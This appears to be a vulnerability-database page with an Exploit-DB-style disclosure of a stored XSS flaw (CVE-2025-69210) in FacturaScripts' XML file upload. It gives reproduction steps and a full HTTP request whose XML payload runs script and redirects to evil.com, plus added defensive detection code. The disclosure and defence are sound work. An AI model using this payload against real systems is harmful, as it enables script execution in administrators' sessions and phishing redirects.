| Title | Published | Views | Source |
|---|---|---|---|
| CVE-2025-69210 | 30 Dec 2025 22:32 | – | circl |
| FacturaScripts cross-site scripting vulnerability | 30 Dec 2025 00:00 | – | cnnvd |
| CVE-2025-69210 | 30 Dec 2025 19:23 | – | cve |
| CVE-2025-69210 FacturaScripts vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 2025 19:23 | – | cvelist |
| FacturaScripts 2025.43 - XSS | 29 Apr 2026 00:00 | – | exploitdb |
| EUVD-2025-205844 | 30 Dec 2025 20:52 | – | euvd |
| FacturaScripts is Vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 2025 20:52 | – | github |
| CVE-2025-69210 | 30 Dec 2025 20:16 | – | nvd |
| CVE-2025-69210 FacturaScripts vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 2025 19:23 | – | osv |
| GHSA-2267-XQCF-GW2M FacturaScripts is Vulnerable to Stored Cross-Site Scripting (XSS) via XML File Upload | 30 Dec 2025 20:52 | – | osv |
# Exploit Title: FacturaScripts 2025.43 - XSS
# Date: 30-12-2025
# Exploit Author: VETTRIVEL U
# Author Profile: https://www.linkedin.com/in/vettrivel2006
# Vendor Homepage: https://facturascripts.com/
# Software Link: https://github.com/NeoRazorX/facturascripts
# Affected Versions: <= 2025.4, = 2025.11, = 2025.41, = 2025.43
# Fixes: https://github.com/NeoRazorX/facturascripts/commit/e908ade21c84bdc9d51190057482316730c66146
# Patched Releases: https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7
# Tested on: Windows
# GitHub Advisories: https://github.com/advisories/GHSA-2267-xqcf-gw2m
# CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69210
# CVE: CVE-2025-69210
----------------------------------------------------------------------------------------
## Description
A stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality.
Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed.
Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session.
----------------------------------------------------------------------------------------
## Steps to Reproduce
1. Log in as a normal user.
2. Navigate to the Warehouse → Products section:
http://localhost:8888/ListProducto
3. Click New Product, enter the details (Example below), and save:
Product Reference: XSS POC
Description: Stored XSS PoC
4. Go to the Files section of the product.
5. Upload a crafted XML file containing JavaScript OR intercept the upload request using Burp Suite.
6. Modify the intercepted request body and inject the following payload as the uploaded XML file:
```http
POST /EditProducto?code=10 HTTP/1.1
Host: localhost:8888
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPU65l8Am0L64rWdo
Cookie: [authenticated session cookies]

------WebKitFormBoundaryPU65l8Am0L64rWdo
Content-Disposition: form-data; name="new-files[]"; filename="xss.xml"
Content-Type: text/xml

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) {
top.location.href = "https://evil.com";
}
</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) {
location.href = "https://evil.com";
}
</a:script>
<info>
<name>
<value>
<![CDATA[
<script>
alert("XSS");
if (confirm("Now Redirect POC")) {
window.location = "https://evil.com";
}
</script>
]]>
</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
------WebKitFormBoundaryPU65l8Am0L64rWdo--
```
7. Forward the request and save the product file.
8. Open the uploaded file using the generated file URL, for example:
http://localhost:8888/MyFiles/2025/12/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9
Observe that:
- A popup with the message “XSS” is displayed.
- Upon clicking OK, the browser redirects to an attacker-controlled domain.
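As an added defensive example (not FacturaScripts code and not from the advisory's author), the following inspects an uploaded XML file for the pattern the Description and Steps above describe, namely a `script` element in the XHTML namespace under any prefix or a literal `<script>` smuggled through CDATA, and returns the response headers that keep a file endpoint from serving such an upload inline. It goes slightly beyond the advisory by also flagging SVG-namespaced script elements and event-handler attributes; the sample document is constructed and the helper names are hypothetical.

```python
# Added example, not FacturaScripts code: upload-side check for the pattern in
# this advisory (XML served as text/xml whose XHTML-namespaced <script> runs).
# Uses stdlib ElementTree to stay self-contained; prefer defusedxml in production.
import xml.etree.ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"
SVG_NS = "http://www.w3.org/2000/svg"          # also executes script when rendered
ACTIVE_NS = {XHTML_NS, SVG_NS}

# Constructed sample mirroring the advisory's payload shape (prefixed script + CDATA).
SAMPLE = (b'<html><body><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)'
          b'</x:script><info><value><![CDATA[<script>alert(1)</script>]]></value>'
          b'</info></body></html>')


def inspect_xml_upload(data: bytes) -> list[str]:
    """Return findings for an uploaded XML document; [] means nothing active found."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML, reject: {exc}"]
    findings = []
    for elem in root.iter():
        # ElementTree spells namespaced tags as "{namespace}local"
        ns, local = elem.tag[1:].split("}", 1) if elem.tag.startswith("{") else ("", elem.tag)
        if local.lower() == "script" and ns in ACTIVE_NS:
            findings.append(f"namespaced script element in {ns}")
        for attr, value in elem.attrib.items():   # onload= / href="javascript:" also run
            name = attr.rsplit("}", 1)[-1].lower()
            if name.startswith("on") or value.strip().lower().startswith("javascript:"):
                findings.append(f"active attribute {name} on <{local}>")
        for text in (elem.text, elem.tail):      # CDATA content surfaces as plain text
            if text and "<script" in text.lower():
                findings.append(f"literal <script> in text/CDATA of <{local}>")
    return findings


def inline_safe_headers(filename: str) -> dict:
    """Response headers that stop a browser rendering a stored upload as a document."""
    safe_name = "".join(c for c in filename if c not in '"\r\n')
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }
```

Rejecting flagged uploads and serving every stored file with these headers addresses the two conditions the Description names: script-bearing content and inline rendering without content-type enforcement.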
----------------------------------------------------------------------------------------
## Impact
- Arbitrary JavaScript execution in the victim’s browser.
- Products created by normal users are visible to administrators. When an admin opens the malicious file, the payload executes in the admin’s session.
- Phishing & Redirect Abuse: Attackers can redirect victims to malicious domains.
- If extended, this vulnerability could be chained with:
  - Session hijacking
  - CSRF token theft
  - Admin API abuse
- Trust Boundary Violation: User-controlled XML content is rendered as active content without sanitization.
## Reference
https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md
https://github.com/advisories/GHSA-2267-xqcf-gw2m
## Author Details
Exploit Author: VETTRIVEL U
Author Profile: https://www.linkedin.com/in/vettrivel2006
GitHub Profile: https://github.com/vettrivel007/Data